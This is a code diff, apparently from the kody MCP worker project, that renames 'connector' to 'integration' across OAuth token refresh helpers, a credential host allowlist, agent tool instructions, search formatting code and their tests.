+const __kodyGetNormalizedApiBaseUrl = (integration) => {
+  if (!integration.apiBaseUrl) return null;
+  return integration.apiBaseUrl.endsWith('/')
+    ? integration.apiBaseUrl.slice(0, -1)
+    : integration.apiBaseUrl;
 };
 const __kodyGetRuntimeOrigin = () => {
   const origin = globalThis.location?.origin ?? null;
   return typeof origin === 'string' && origin.length > 0 ? origin : null;
 };
-const __kodyResolveRelativeUrl = (pathname, connector) => {
-  const normalizedBase = __kodyGetNormalizedApiBaseUrl(connector);
+const __kodyResolveRelativeUrl = (pathname, integration) => {
+  const normalizedBase = __kodyGetNormalizedApiBaseUrl(integration);
   if (!normalizedBase) {
     throw new Error(
-      \`Connector "\${connector.name}" does not define apiBaseUrl for relative requests.\`,
+      \`Integration "\${integration.name}" does not define apiBaseUrl for relative requests.\`,
     );
   }
   return new URL(\`\${normalizedBase}\${pathname}\`);
 };
-const __kodyGetRelativePathFromRequest = (input, connector) => {
+const __kodyGetRelativePathFromRequest = (input, integration) => {
   const requestUrl = new URL(input.url);
-  const normalizedBase = __kodyGetNormalizedApiBaseUrl(connector);
+  const normalizedBase = __kodyGetNormalizedApiBaseUrl(integration);
   if (normalizedBase && requestUrl.href.startsWith(normalizedBase)) {
     return null;
   }
@@ -459,27 +462,27 @@ const __kodyGetRelativePathFromRequest = (input, connector) => {
   }
   return \`\${requestUrl.pathname}\${requestUrl.search}\${requestUrl.hash}\`;
 };
-const __kodyResolveRequestUrl = (input, connector) => {
+const __kodyResolveRequestUrl = (input, integration) => {
   if (typeof input === 'string' && input.startsWith('/')) {
-    return __kodyResolveRelativeUrl(input, connector);
+    return __kodyResolveRelativeUrl(input, integration);
   }
   if (input instanceof URL) return input;
   if (typeof input === 'string') return input;
   if (input instanceof Request) {
-    const relativePath = __kodyGetRelativePathFromRequest(input, connector);
+    const relativePath = __kodyGetRelativePathFromRequest(input, integration);
     if (relativePath) {
-      return new Request(__kodyResolveRelativeUrl(relativePath, connector), input);
+      return new Request(__kodyResolveRelativeUrl(relativePath, integration), input);
     }
   }
   return input;
 };
 const __kodyRefreshAccessToken = async (providerName) => {
-  const connector = await __kodyReadConnectorConfig(providerName);
-  const clientId = await __kodyReadClientId(connector);
-  const refreshTokenSecretName = connector.refreshTokenSecretName?.trim() ?? '';
+  const integration = await __kodyReadIntegrationConfig(providerName);
+  const clientId = await __kodyReadClientId(integration);
+  const refreshTokenSecretName = integration.refreshTokenSecretName?.trim() ?? '';
   if (!refreshTokenSecretName) {
     throw new Error(
-      \`Connector "\${providerName}" does not define a refresh token secret name.\`,
+      \`Integration "\${providerName}" does not define a refresh token secret name.\`,
     );
   }
   const params = new URLSearchParams();
@@ -489,11 +492,11 @@ const __kodyRefreshAccessToken = async (providerName) => {
     __kodyBuildSecretPlaceholder(refreshTokenSecretName, 'user'),
   );
   params.set('client_id', clientId);
-  if (connector.flow === 'confidential') {
-    const clientSecretSecretName = connector.clientSecretSecretName?.trim() ?? '';
+  if (integration.flow === 'confidential') {
+    const clientSecretSecretName = integration.clientSecretSecretName?.trim() ?? '';
     if (!clientSecretSecretName) {
       throw new Error(
-        \`Connector "\${providerName}" uses confidential flow but does not define a client secret secret name.\`,
+        \`Integration "\${providerName}" uses confidential flow but does not define a client secret secret name.\`,
       );
     }
     params.set(
@@ -501,7 +504,7 @@ const __kodyRefreshAccessToken = async (providerName) => {
       __kodyBuildSecretPlaceholder(clientSecretSecretName, 'user'),
     );
   }
-  const response = await fetch(connector.tokenUrl, {
+  const response = await fetch(integration.tokenUrl, {
     method: 'POST',
     headers: {
       Accept: 'application/json',
@@ -512,12 +515,12 @@ const __kodyRefreshAccessToken = async (providerName) => {
   const payload = await response.json().catch(() => null);
   if (!response.ok) {
     throw new Error(
-      \`Token refresh failed for connector "\${providerName}" with HTTP \${response.status}.\`,
+      \`Token refresh failed for integration "\${providerName}" with HTTP \${response.status}.\`,
     );
   }
   if (!payload || typeof payload.access_token !== 'string') {
     throw new Error(
-      \`Token refresh for connector "\${providerName}" did not return an access_token.\`,
+      \`Token refresh for integration "\${providerName}" did not return an access_token.\`,
     );
   }
   if (typeof payload.refresh_token === 'string' && payload.refresh_token.length > 0) {
@@ -530,18 +533,18 @@ const __kodyRefreshAccessToken = async (providerName) => {
   }
   await __kodyPersistSecret(
     providerName,
-    connector.accessTokenSecretName,
+    integration.accessTokenSecretName,
     'access token',
     payload.access_token,
   );
   return payload.access_token;
 };
 const __kodyCreateAuthenticatedFetch = async (providerName) => {
-  const connector = await __kodyReadConnectorConfig(providerName);
+  const integration = await __kodyReadIntegrationConfig(providerName);
   const accessToken = await __kodyRefreshAccessToken(providerName);
   return async (input, init) => {
-    const resolvedUrl = __kodyResolveRequestUrl(input, connector);
-    __kodyAssertConnectorHostAllowed(providerName, connector, resolvedUrl);
+    const resolvedUrl = __kodyResolveRequestUrl(input, integration);
+    __kodyAssertIntegrationHostAllowed(providerName, integration, resolvedUrl);
     const request = new Request(resolvedUrl, init);
     const headers = new Headers(request.headers);
     headers.set('Authorization', \`Bearer \${accessToken}\`);

--- a/packages/worker/src/mcp/execute-modules/integration-host-allowlist.ts
+++ b/packages/worker/src/mcp/execute-modules/integration-host-allowlist.ts
@@ -2,48 +2,48 @@ function normalizeHost(host: string) {
 	return host.trim().toLowerCase()
 }
 
-type ConnectorAllowlistInput = {
+type IntegrationAllowlistInput = {
 	apiBaseUrl?: string | null
 	requiredHosts?: Array<string>
 }
 
 /**
- * Thrown when an outbound request targets a host not in the connector's
+ * Thrown when an outbound request targets a host not in the integration's
  * allowlist (`requiredHosts` + `apiBaseUrl` host). This prevents OAuth tokens
  * from being sent to arbitrary attacker-controlled hosts.
  */
-export class ConnectorHostNotAllowedError extends Error {
-	override name = 'ConnectorHostNotAllowedError'
-	connectorName: string
+export class IntegrationHostNotAllowedError extends Error {
+	override name = 'IntegrationHostNotAllowedError'
+	integrationName: string
 	disallowedHost: string
 
-	constructor(connectorName: string, disallowedHost: string) {
+	constructor(integrationName: string, disallowedHost: string) {
 		super(
-			`Connector "${connectorName}" does not allow requests to host "${disallowedHost}". ` +
-				`The host must be listed in the connector's requiredHosts or match its apiBaseUrl.`,
+			`Integration "${integrationName}" does not allow requests to host "${disallowedHost}". ` +
+				`The host must be listed in the integration's requiredHosts or match its apiBaseUrl.`,
 		)
-		this.connectorName = connectorName
+		this.integrationName = integrationName
 		this.disallowedHost = disallowedHost
 	}
 }
 
 /**
- * Returns the set of normalized allowed hosts for a connector definition.
+ * Returns the set of normalized allowed hosts for an integration definition.
  * Includes all `requiredHosts` entries plus the host derived from `apiBaseUrl`.
  */
-export function getConnectorAllowedHosts(
-	connector: ConnectorAllowlistInput,
+export function getIntegrationAllowedHosts(
+	integration: IntegrationAllowlistInput,
 ): Array<string> {
 	const hosts = new Set<string>()
-	if (connector.requiredHosts) {
-		for (const host of connector.requiredHosts) {
+	if (integration.requiredHosts) {
+		for (const host of integration.requiredHosts) {
 			const normalized = normalizeHost(host)
 			if (normalized) hosts.add(normalized)
 		}
 	}
-	if (connector.apiBaseUrl) {
+	if (integration.apiBaseUrl) {
 		try {
-			const apiHost = normalizeHost(new URL(connector.apiBaseUrl).hostname)
+			const apiHost = normalizeHost(new URL(integration.apiBaseUrl).hostname)
 			if (apiHost) hosts.add(apiHost)
 		} catch {
 			// apiBaseUrl is not a valid URL; skip
@@ -53,14 +53,14 @@ export function getConnectorAllowedHosts(
 }
 
 /**
- * Asserts that the given URL targets a host allowed by the connector.
- * Throws `ConnectorHostNotAllowedError` if the host is not in the allowlist.
+ * Asserts that the given URL targets a host allowed by the integration.
+ * Throws `IntegrationHostNotAllowedError` if the host is not in the allowlist.
  *
  * Call this **before** attaching any credentials to the outbound request.
  */
-export function assertConnectorHostAllowed(
-	connectorName: string,
-	connector: ConnectorAllowlistInput,
+export function assertIntegrationHostAllowed(
+	integrationName: string,
+	integration: IntegrationAllowlistInput,
 	url: string | URL | Request,
 ): void {
 	const resolvedUrl = resolveUrlString(url)
@@ -75,16 +75,16 @@ export function assertConnectorHostAllowed(
 
 	if (!requestHost) return
 
-	const allowedHosts = getConnectorAllowedHosts(connector)
+	const allowedHosts = getIntegrationAllowedHosts(integration)
 	if (allowedHosts.length === 0) {
 		throw new Error(
-			`Connector "${connectorName}" has no allowed hosts configured (requiredHosts and apiBaseUrl are both empty). ` +
+			`Integration "${integrationName}" has no allowed hosts configured (requiredHosts and apiBaseUrl are both empty). ` +
 				`Cannot attach credentials without a host allowlist.`,
 		)
 	}
 
 	if (!allowedHosts.includes(requestHost)) {
-		throw new ConnectorHostNotAllowedError(connectorName, requestHost)
+		throw new IntegrationHostNotAllowedError(integrationName, requestHost)
 	}
 }
 

--- a/packages/worker/src/mcp/server-instructions.ts
+++ b/packages/worker/src/mcp/server-instructions.ts
@@ -13,7 +13,7 @@ End-user documentation (workflows, secrets, troubleshooting):
 https://github.com/kentcdodds/kody/tree/main/docs/use
 
 Three-step flow:
-1. \`search\` — built-in capabilities, saved packages, persisted values, saved connectors, and secret references (metadata).
+1. \`search\` — built-in capabilities, saved packages, persisted values, saved integrations, and secret references (metadata).
 2. \`execute\` — run one ephemeral module with imports/exports and runtime access through \`kody:runtime\`.
 3. \`open_generated_ui\` — open UI when a package or inline UI flow needs user interaction.
 
@@ -41,11 +41,11 @@ Domains (builtin capability groups)
 ${domainInstructions}
 
 What shows up in \`search\` (before you search)
-- Result **types**: \`capability\` (built-in), \`package\` (saved repo-backed package), \`value\` (persisted non-secret config), \`connector\` (saved connector config), \`secret\` (metadata only). Use \`entity: "{id}:{type}"\` for one item’s detail.
+- Result **types**: \`capability\` (built-in), \`package\` (saved repo-backed package), \`value\` (persisted non-secret config), \`integration\` (saved integration config), \`secret\` (metadata only). Use \`entity: "{id}:{type}"\` for one item’s detail.
 
 search
 - \`query\`: natural language; results are ranked (order matters). Optional \`limit\`, \`maxResponseSize\`.
-- \`entity: "{id}:{type}"\` (\`capability\` | \`package\` | \`value\` | \`connector\` | \`secret\`) for one entity’s detail (TypeScript call shapes, usage). If a \`query\` returns no useful hits, rephrase or call \`meta_list_capabilities\` — \`entity\` does not repair an empty ranked list.
+- \`entity: "{id}:{type}"\` (\`capability\` | \`package\` | \`value\` | \`integration\` | \`secret\`) for one entity’s detail (TypeScript call shapes, usage). If a \`query\` returns no useful hits, rephrase or call \`meta_list_capabilities\` — \`entity\` does not repair an empty ranked list.
 - Examples:
   - search({ query: 'saved package for github automation' })
   - search({ query: 'Cloudflare API zones dns workers d1' })
@@ -55,7 +55,7 @@ execute
 - Single ESM module string with a default export such as \`export default async function main(input = {}) { ... }\`; \`params\` are passed as the first argument. Import runtime APIs from \`kody:runtime\`. Example: \`import { codemode, refreshAccessToken, createAuthenticatedFetch } from 'kody:runtime'\`. Prefer one \`execute\` when the plan is clear. Full rules for \`fetch\`, placeholders, \`secret_list\` / \`value_get\`, and \`x-kody-secret\`: see the \`execute\` tool description.
 - Cross-package imports use specifiers such as \`kody:@scope/my-package/export-name\`. Saved package names must be scoped (\`@scope/<leaf>\`) and the leaf segment must match \`kody.id\`. Package jobs are owned by packages, ad hoc jobs can be scheduled with \`job_schedule\`, and package apps are optional package surfaces.
 - Official how-to guides from the Kody repo: if a requested package or workflow depends on a third-party integration, secrets, or OAuth, call \`kody_official_guide\` with \`guide: "integration_bootstrap"\` before building the package. Then load the relevant setup guide: \`oauth\` for standard third-party OAuth (\`/connect/oauth\`), \`connect_secret\` for secret collection, and \`secret_backed_integration\` for the default non-OAuth secret-backed recipe after bootstrap. If unsure, \`search\` for this capability and load the right guide before implementing.
-- Do not save or present an auth-dependent package as complete until \`search\` shows the required connector or secret reference exists and a minimal authenticated \`execute\` smoke test succeeds.
+- Do not save or present an auth-dependent package as complete until \`search\` shows the required integration or secret reference exists and a minimal authenticated \`execute\` smoke test succeeds.
 
 open_generated_ui
 - Use UI when the package needs user interaction or sensitive input. Details: \`open_generated_ui\` tool description.

--- a/packages/worker/src/mcp/tools/execute.ts
+++ b/packages/worker/src/mcp/tools/execute.ts
@@ -49,7 +49,7 @@ Sandbox surface:
 - Import runtime helpers from \`kody:runtime\`.
 - \`import { codemode } from 'kody:runtime'\` for builtin capabilities.
 - \`import { storage } from 'kody:runtime'\` for durable storage helpers on the bound \`storageId\`, including \`storage.sql(query, params?)\`.
-- \`import { refreshAccessToken, createAuthenticatedFetch } from 'kody:runtime'\` for OAuth connectors. Connector \`name\` may be account-specific (e.g. \`google-personal\`, \`google-business\`); call \`connector_list\` first when the task involves a provider that may have multiple accounts connected.
+- \`import { refreshAccessToken, createAuthenticatedFetch } from 'kody:runtime'\` for OAuth integrations. Integration \`name\` may be account-specific (e.g. \`google-personal\`, \`google-business\`); call \`integration_list\` first when the task involves a provider that may have multiple accounts connected.
 - \`import { agentChatTurnStream } from 'kody:runtime'\` for streamed agent turns.
 - Optional \`params\` are passed as the first argument to the module default export. Prefer \`export default async function main(input = {}) { ... }\`; pass \`input\` to shared helpers explicitly.
 - \`import { packageContext } from 'kody:runtime'\` in saved package code when you need package metadata; it is \`null\` for ad hoc execute calls.

--- a/packages/worker/src/mcp/tools/search-format.node.test.ts
+++ b/packages/worker/src/mcp/tools/search-format.node.test.ts
@@ -8,18 +8,18 @@ import {
 	toSlimStructuredMatches,
 } from './search-format.ts'
 
-test('parseEntityRef accepts value and connector entity types', () => {
+test('parseEntityRef accepts value and integration entity types', () => {
 	expect(parseEntityRef('user:preferred_repo:value')).toEqual({
 		id: 'user:preferred_repo',
 		type: 'value',
 	})
-	expect(parseEntityRef('github:connector')).toEqual({
+	expect(parseEntityRef('github:integration')).toEqual({
 		id: 'github',
-		type: 'connector',
+		type: 'integration',
 	})
 })
 
-test('search formatting keeps value and connector entity refs in the structured contract', () => {
+test('search formatting keeps value and integration entity refs in the structured contract', () => {
 	const structuredMatches = toSlimStructuredMatches({
 		baseUrl: 'http://localhost',
 		matches: [
@@ -37,10 +37,10 @@ test('search formatting keeps value and connector entity refs in the structured 
 				fusedScore: 1,
 			},
 			{
-				type: 'connector',
-				connectorName: 'github',
+				type: 'integration',
+				integrationName: 'github',
 				title: 'github',
-				description: 'GitHub OAuth connector config',
+				description: 'GitHub OAuth integration config',
 				flow: 'confidential',
 				tokenUrl: 'https://github.com/login/oauth/access_token',
 				apiBaseUrl: 'https://api.github.com',
@@ -49,7 +49,7 @@ test('search formatting keeps value and connector entity refs in the structured 
 				accessTokenSecretName: 'github_access_token',
 				refreshTokenSecretName: 'github_refresh_token',
 				requiredHosts: ['api.github.com'],
-				usage: 'Read with connector_get: {"name":"github"}.',
+				usage: 'Read with integration_get: {"name":"github"}.',
 				fusedScore: 0.9,
 			},
 		],
@@ -64,19 +64,19 @@ test('search formatting keeps value and connector entity refs in the structured 
 		appId: null,
 		usage: expect.any(String),
 	})
-	const connectorMatch = structuredMatches[1]
-	expect(connectorMatch).toMatchObject({
-		type: 'connector',
-		entityRef: 'github:connector',
+	const integrationMatch = structuredMatches[1]
+	expect(integrationMatch).toMatchObject({
+		type: 'integration',
+		entityRef: 'github:integration',
 		flow: 'confidential',
 		tokenUrl: 'https://github.com/login/oauth/access_token',
 		requiredHosts: ['api.github.com'],
 		usage: expect.any(String),
 	})
-	expect(connectorMatch?.nextStep).toEqual(expect.any(String))
+	expect(integrationMatch?.nextStep).toEqual(expect.any(String))
 })
 
-test('entity detail formatting returns stable structured details for values and connectors', () => {
+test('entity detail formatting returns stable structured details for values and integrations', () => {
 	const valueDetail = formatEntityDetailMarkdown({
 		type: 'value',
 		id: 'user:preferred_repo',
@@ -100,16 +100,16 @@ test('entity detail formatting returns stable structured details for values and 
 		value: 'kentcdodds/kody',
 	})
 
-	const connectorDetail = formatEntityDetailMarkdown({
-		type: 'connector',
+	const integrationDetail = formatEntityDetailMarkdown({
+		type: 'integration',
 		id: 'github',
 		title: 'github',
-		description: 'GitHub OAuth connector config',
+		description: 'GitHub OAuth integration config',
 		row: {
-			name: '_connector:github',
+			name: '_integration:github',
 			scope: 'user',
 			value: '{}',
-			description: 'GitHub OAuth connector config',
+			description: 'GitHub OAuth integration config',
 			appId: null,
 			createdAt: '2026-03-20T00:00:00.000Z',
 			updatedAt: '2026-03-20T00:00:00.000Z',
@@ -127,9 +127,9 @@ test('entity detail formatting returns stable structured details for values and 
 			requiredHosts: ['api.github.com'],
 		},
 	})
-	expect(connectorDetail.structured).toMatchObject({
-		type: 'connector',
-		entityRef: 'github:connector',
+	expect(integrationDetail.structured).toMatchObject({
+		type: 'integration',
+		entityRef: 'github:integration',
 		flow: 'confidential',
 		tokenUrl: 'https://github.com/login/oauth/access_token',
 		apiBaseUrl: 'https://api.github.com',
@@ -518,10 +518,10 @@ test('search markdown keeps broad query results compact', () => {
 				},
 			},
 			{
-				type: 'connector',
-				connectorName: 'github',
+				type: 'integration',
+				integrationName: 'github',
 				title: 'github',
-				description: 'GitHub OAuth connector config',
+				description: 'GitHub OAuth integration config',
 				flow: 'confidential',
 				tokenUrl: 'https://github.com/login/oauth/access_token',
 				apiBaseUrl: 'https://api.github.com',
@@ -535,7 +535,7 @@ test('search markdown keeps broad query results compact', () => {
 	})
 
 	expect(markdown).toContain('observed-package:package')
-	expect(markdown).toContain('github:connector')
+	expect(markdown).toContain('github:integration')
 	expect(markdown).not.toContain('## Recommended next step')
 	expect(markdown).not.toContain('## Relevant memories')
 	expect(markdown).not.toContain('**README')
@@ -638,7 +638,7 @@ test('search formatting surfaces package retriever results', () => {
 })
 
 test('usage helpers escape dynamic identifiers in generated snippets', () => {
-	const [valueMatch, connectorMatch] = toSlimStructuredMatches({
+	const [valueMatch, integrationMatch] = toSlimStructuredMatches({
 		baseUrl: 'http://localhost',
 		matches: [
 			{
@@ -650,10 +650,10 @@ test('usage helpers escape dynamic identifiers in generated snippets', () => {
 				appId: null,
 			},
 			{
-				type: 'connector',
-				connectorName: 'conn"name',
+				type: 'integration',
+				integrationName: 'conn"name',
 				title: 'conn"name',
-				description: 'Connector with quotes in its name.',
+				description: 'Integration with quotes in its name.',
 				flow: 'confidential',
 				tokenUrl: 'https://example.com/token',
 				apiBaseUrl: 'https://example.com/api',
@@ -671,9 +671,9 @@ test('usage helpers escape dynamic identifiers in generated snippets', () => {
 		usage:
 			'codemode.value_get({ name: "display\\"name", scope: "user\\"scope" })',
 	})
-	expect(connectorMatch).toMatchObject({
-		type: 'connector',
-		usage: 'codemode.connector_get({ name: "conn\\"name" })',
+	expect(integrationMatch).toMatchObject({
+		type: 'integration',
+		usage: 'codemode.integration_get({ name: "conn\\"name" })',
 	})
 })
 

--- a/packages/worker/src/mcp/tools/search-format.ts
+++ b/packages/worker/src/mcp/tools/search-format.ts
@@ -1,5 +1,5 @@
 import { type CapabilitySpec } from '#mcp/capabilities/types.ts'
-import { type ConnectorConfig } from '#mcp/capabilities/values/connector-shared.ts'
+import { type IntegrationConfig } from '#mcp/capabilities/values/integration-shared.ts'
 import { type SecretSearchRow } from '#mcp/secrets/types.ts'
 import { type ValueMetadata } from '#mcp/values/types.ts'
 import { buildPackageReadmeDetail } from '#worker/package-registry/package-readme.ts'
@@ -24,13 +24,13 @@ export type SearchEntityType =
 	| 'package'
 	| 'secret'
 	| 'value'
-	| 'connector'
+	| 'integration'
 
 type SearchMatchType =
 	| 'capability'
 	| 'package'
 	| 'value'
-	| 'connector'
+	| 'integration'
 	| 'secret'
 	| 'retriever_result'
 
@@ -138,7 +138,7 @@ export type SlimSearchMatch =
 			appId: string | null
 	  }
 	| {
-			type: 'connector'
+			type: 'integration'
 			id: string
 			entityRef: string
 			name: string
@@ -267,13 +267,13 @@ export type SearchEntityDetailStructured =
 	  }
 	| {
 			kind: 'entity'
-			type: 'connector'
+			type: 'integration'
 			id: string
 			entityRef: string
 			title: string
 			description: string
 			usage: string
-			flow: ConnectorConfig['flow']
+			flow: IntegrationConfig['flow']
 			tokenUrl: string
 			apiBaseUrl: string | null
 			clientIdValueName: string
@@ -316,12 +316,12 @@ export type SearchEntityDetail =
 			row: ValueMetadata
 	  }
 	| {
-			type: 'connector'
+			type: 'integration'
 			id: string
 			title: string
 			description: string
 			row: ValueMetadata
-			config: ConnectorConfig
+			config: IntegrationConfig
 	  }
 
 export type SearchMatch =
@@ -354,8 +354,8 @@ export type SearchMatch =
 			appId: string | null
 	  }
 	| {
-			type: 'connector'
-			connectorName: string
+			type: 'integration'
+			integrationName: string
 			title: string
 			description: string
 			flow: string
@@ -404,8 +404,8 @@ function buildValueUsage(name: string, scope: string) {
 	return `codemode.value_get({ name: ${JSON.stringify(name)}, scope: ${JSON.stringify(scope)} })`
 }
 
-function buildConnectorUsage(name: string) {
-	return `codemode.connector_get({ name: ${JSON.stringify(name)} })`
+function buildIntegrationUsage(name: string) {
+	return `codemode.integration_get({ name: ${JSON.stringify(name)} })`
 }
 
 function buildSecretUsage(name: string) {
@@ -447,7 +447,7 @@ export function parseEntityRef(entity: string): {
 	const separator = trimmed.lastIndexOf(':')
 	if (separator <= 0 || separator === trimmed.length - 1) {
 		throw new Error(
-			'Entity must use the format "{id}:{type}" where type is capability, package, secret, value, or connector.',
+			'Entity must use the format "{id}:{type}" where type is capability, package, secret, value, or integration.',
 		)
 	}
 	const id = trimmed.slice(0, separator).trim()
@@ -457,10 +457,10 @@ export function parseEntityRef(entity: string): {
 		type !== 'package' &&
 		type !== 'secret' &&
 		type !== 'value' &&
-		type !== 'connector'
+		type !== 'integration'
 	) {
 		throw new Error(
-			'Entity type must be one of: capability, package, secret, value, or connector.',
+			'Entity type must be one of: capability, package, secret, value, or integration.',
 		)
 	}
 	if (!id) {
@@ -520,9 +520,9 @@ function formatMatchListItem(match: SearchMatch, index: number) {
 		const entityRef = buildEntityRef(match.valueId, 'value')
 		return `${String(index + 1)}. **value** ${formatMarkdownInlineCode(match.name)} (${formatMarkdownInlineCode(match.scope)} scope) — ${escapeMarkdownText(formatOneLineSentence(match.description))} Entity: ${formatMarkdownInlineCode(entityRef)}`
 	}
-	if (match.type === 'connector') {
-		const entityRef = buildEntityRef(match.connectorName, 'connector')
-		return `${String(index + 1)}. **connector** ${formatMarkdownInlineCode(match.connectorName)} — ${escapeMarkdownText(formatOneLineSentence(match.description))} Entity: ${formatMarkdownInlineCode(entityRef)}`
+	if (match.type === 'integration') {
+		const entityRef = buildEntityRef(match.integrationName, 'integration')
+		return `${String(index + 1)}. **integration** ${formatMarkdownInlineCode(match.integrationName)} — ${escapeMarkdownText(formatOneLineSentence(match.description))} Entity: ${formatMarkdownInlineCode(entityRef)}`
 	}
 	if (match.type === 'retriever_result') {
 		const source = match.source ?? `${match.kodyId}/${match.retrieverKey}`
@@ -597,15 +597,15 @@ export function toSlimStructuredMatches(input: {
 				appId: match.appId,
 			}
 		}
-		if (match.type === 'connector') {
+		if (match.type === 'integration') {
 			return {
-				type: 'connector',
-				id: match.connectorName,
-				entityRef: buildEntityRef(match.connectorName, 'connector'),
-				name: match.connectorName,
+				type: 'integration',
+				id: match.integrationName,
+				entityRef: buildEntityRef(match.integrationName, 'integration'),
+				name: match.integrationName,
 				title: match.title,
 				description: match.description,
-				usage: buildConnectorUsage(match.connectorName),
+				usage: buildIntegrationUsage(match.integrationName),
 				flow: match.flow,
 				tokenUrl: match.tokenUrl,
 				apiBaseUrl: match.apiBaseUrl,
@@ -614,7 +614,7 @@ export function toSlimStructuredMatches(input: {
 				clientSecretSecretName: match.clientSecretSecretName,
 				accessTokenSecretName: match.accessTokenSecretName,
 				refreshTokenSecretName: match.refreshTokenSecretName,
-				nextStep: `Inspect connector detail with search({ entity: "${match.connectorName}:connector" }) and then run a minimal authenticated execute smoke test before building or calling integration-backed code.`,
+				nextStep: `Inspect integration detail with search({ entity: "${match.integrationName}:integration" }) and then run a minimal authenticated execute smoke test before building or calling integration-backed code.`,
 			}
 		}
 		if (match.type === 'retriever_result') {
@@ -881,25 +881,25 @@ export function formatEntityDetailMarkdown(detail: SearchEntityDetail) {
 		}
 	}
 
-	if (detail.type === 'connector') {
+	if (detail.type === 'integration') {
 		const requiredHosts = detail.config.requiredHosts ?? []
 		const lines = [
-			`# Connector — \`${detail.config.name}\``,
+			`# Integration — \`${detail.config.name}\``,
 			'',
 			detail.description,
 			'',
 			'## Summary',
 			'',
-			`- Entity: \`${buildEntityRef(detail.id, 'connector')}\``,
+			`- Entity: \`${buildEntityRef(detail.id, 'integration')}\``,
 			`- Flow: \`${detail.config.flow}\``,
 			`- Token URL: \`${detail.config.tokenUrl}\``,
 			`- API base URL: ${detail.config.apiBaseUrl ? `\`${detail.config.apiBaseUrl}\`` : 'none'}`,
 			`- Required hosts: ${requiredHosts.length > 0 ? requiredHosts.map((host) => `\`${host}\``).join(', ') : 'none'}`,
 			'',
-			'## Read this connector',
+			'## Read this integration',
 			'',
-			`- \`${buildConnectorUsage(detail.config.name)}\``,
-			'- `codemode.connector_list({})`',
+			`- \`${buildIntegrationUsage(detail.config.name)}\``,
+			'- `codemode.integration_list({})`',
 			'',
 			'## Related stored names',
 			'',
@@ -912,12 +912,12 @@ export function formatEntityDetailMarkdown(detail: SearchEntityDetail) {
 			markdown: lines.join('\n'),
 			structured: {
 				kind: 'entity',
-				type: 'connector',
+				type: 'integration',
 				id: detail.id,
-				entityRef: buildEntityRef(detail.id, 'connector'),
+				entityRef: buildEntityRef(detail.id, 'integration'),
 				title: detail.title,
 				description: detail.description,
-				usage: buildConnectorUsage(detail.config.name),
+				usage: buildIntegrationUsage(detail.config.name),
 				flow: detail.config.flow,
 				tokenUrl: detail.config.tokenUrl,
 				apiBaseUrl: detail.config.apiBaseUrl ?? null,

--- a/packages/worker/src/mcp/tools/search.node.test.ts
+++ b/packages/worker/src/mcp/tools/search.node.test.ts
@@ -1,6 +1,6 @@
 import { expect, test, vi } from 'vitest'
 import { buildCapabilityRegistry } from '#mcp/capabilities/build-capability-registry.ts'
-import { buildConnectorValueName } from '#mcp/capabilities/values/connector-shared.ts'
+import { buildIntegrationValueName } from '#mcp/capabilities/values/integration-shared.ts'
 import type * as PackageRegistrySource from '#worker/package-registry/source.ts'
 import { parseAuthoredPackageJson } from '#worker/package-registry/manifest.ts'
 import {
@@ -117,7 +117,7 @@ test('searchUnified ranks mixed search rows through one shared pipeline', async 
 				ttlMs: null,
 			},
 			{
-				name: buildConnectorValueName('github'),
+				name: buildIntegrationValueName('github'),
 				scope: 'user',
 				value: JSON.stringify({
 					tokenUrl: 'https://delta.example/token',
@@ -129,7 +129,7 @@ test('searchUnified ranks mixed search rows through one shared pipeline', async 
 					refreshTokenSecretName: 'github-refresh-token',
 					requiredHosts: ['epsilon.example'],
 				}),
-				description: 'alpha beta gamma connector',
+				description: 'alpha beta gamma integration',
 				appId: null,
 				createdAt: '2026-04-20T00:00:00.000Z',
 				updatedAt: '2026-04-20T00:00:00.000Z',
@@ -164,8 +164,8 @@ test('searchUnified ranks mixed search rows through one shared pipeline', async 
 				name: 'preferred-alpha',
 			}),
 			expect.objectContaining({
-				type: 'connector',
-				connectorName: 'github',
+				type: 'integration',
+				integrationName: 'github',
 				tokenUrl: 'https://delta.example/token',
 				clientIdValueName: 'github-client-id',
 				clientSecretSecretName: 'github-client-secret',
@@ -419,7 +419,7 @@ test('optional search rows preserve package fallback warnings', async () => {
 	expect(result.warnings).toEqual(['fallback warning'])
 })
 
-test('searchUnified ranks related packages and connectors for operate queries', async () => {
+test('searchUnified ranks related packages and integrations for operate queries', async () => {
 	const registry = buildCapabilityRegistry([])
 	const optionalRows = {
 		packageRows: [
@@ -464,7 +464,7 @@ test('searchUnified ranks related packages and connectors for operate queries', 
 		userSecretRows: [],
 		userValueRows: [
 			{
-				name: buildConnectorValueName('spotify'),
+				name: buildIntegrationValueName('spotify'),
 				scope: 'user',
 				value: JSON.stringify({
 					tokenUrl: 'https://accounts.spotify.com/api/token',
@@ -476,7 +476,7 @@ test('searchUnified ranks related packages and connectors for operate queries', 
 					refreshTokenSecretName: 'spotify-refresh-token',
 					requiredHosts: ['api.spotify.com'],
 				}),
-				description: 'Spotify playback and music OAuth connector config',
+				description: 'Spotify playback and music OAuth integration config',
 				appId: null,
 				createdAt: '2026-04-20T00:00:00.000Z',
 				updatedAt: '2026-04-20T00:00:00.000Z',
@@ -501,8 +501,8 @@ test('searchUnified ranks related packages and connectors for operate queries', 
 				kodyId: 'spotify',
 			}),
 			expect.objectContaining({
-				type: 'connector',
-				connectorName: 'spotify',
+				type: 'integration',
+				integrationName: 'spotify',
 			}),
 		]),
 	)
@@ -864,7 +864,7 @@ test('buildSavedPackageSearchRows falls back when package source resolution fail
 	expect(result.warnings).toHaveLength(1)
 })
 
-test('search guidance does not pair unrelated package and connector matches', async () => {
+test('search guidance does not pair unrelated package and integration matches', async () => {
 	const registry = buildCapabilityRegistry([])
 	const result = await searchUnified({
 		env: {} as Env,
@@ -906,7 +906,7 @@ test('search guidance does not pair unrelated package and connector matches', as
 			userSecretRows: [],
 			userValueRows: [
 				{
-					name: buildConnectorValueName('github'),
+					name: buildIntegrationValueName('github'),
 					scope: 'user',
 					value: JSON.stringify({
 						tokenUrl: 'https://github.com/login/oauth/access_token',
@@ -918,7 +918,7 @@ test('search guidance does not pair unrelated package and connector matches', as
 						refreshTokenSecretName: 'github-refresh-token',
 						requiredHosts: ['api.github.com'],
 					}),
-					description: 'GitHub OAuth connector config',
+					description: 'GitHub OAuth integration config',
 					appId: null,
 					createdAt: '2026-04-20T00:00:00.000Z',
 					updatedAt: '2026-04-20T00:00:00.000Z',

--- a/packages/worker/src/mcp/tools/search.ts
+++ b/packages/worker/src/mcp/tools/search.ts
@@ -2,10 +2,10 @@ import * as Sentry from '@sentry/cloudflare'
 import { type ToolAnnotations } from '@modelcontextprotocol/sdk/types.js'
 import { z } from 'zod'
 import {
